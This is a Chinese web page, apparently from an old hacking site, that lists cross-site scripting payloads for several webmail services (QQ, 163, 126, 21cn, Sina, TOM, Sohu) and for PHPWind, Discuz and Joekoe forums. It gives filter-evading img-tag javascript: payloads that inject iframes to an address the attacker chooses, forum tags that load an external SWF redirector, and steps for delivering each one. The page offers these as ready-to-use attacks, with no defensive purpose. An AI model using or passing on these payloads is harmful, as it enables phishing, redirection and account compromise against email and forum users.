QQ邮箱:
<img src=document.write('<Iframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe%3E')>
利用方法:"写信"—点击"显示工具条"—"<HTML>",输入跨站代码即可。
163邮箱:
<img src=j avascript:document.write('%3CIframe%20src=输入你要跨的地址%20width=500%20height=550%3E%3C/iframe%3E')>
利用方法:编辑源码处打上勾,输入跨站代码即可。
126邮箱(同时也适用于QQ邮箱):
<img src=javascri& #x70t:document.write('& #x3cIframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe% 3E')>
利用方法:编辑源码处打上勾,输入跨站代码即可。
21cn邮箱:
利用方法:风格设为为"左右"—"写信"—"插入图片",在弹出的框里输入跨站代码即可。
新浪邮箱:
利用方法:"写信"—"插入图片",在弹出的框里输入跨站代码即可。
TOM邮箱:
利用方法:"写信"—"编辑HTML信件",再勾选上"编辑源码",输入跨站代码即可。
Sohu邮箱:
利用方法:直接发送即可,但要回复才能看见效果。
同时还适合于更多邮箱
BBS的直接跨站漏洞(swf跳转)——
PHPWind论坛的跨站代码: [wmv]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/wmv]
Discuz论坛的跨站代码: [flash]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/flash]
Joekoe论坛的跨站代码: [QT=450,350]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/QT]
[推荐]邮箱的内嵌式框架跨站漏洞
您现在的位置: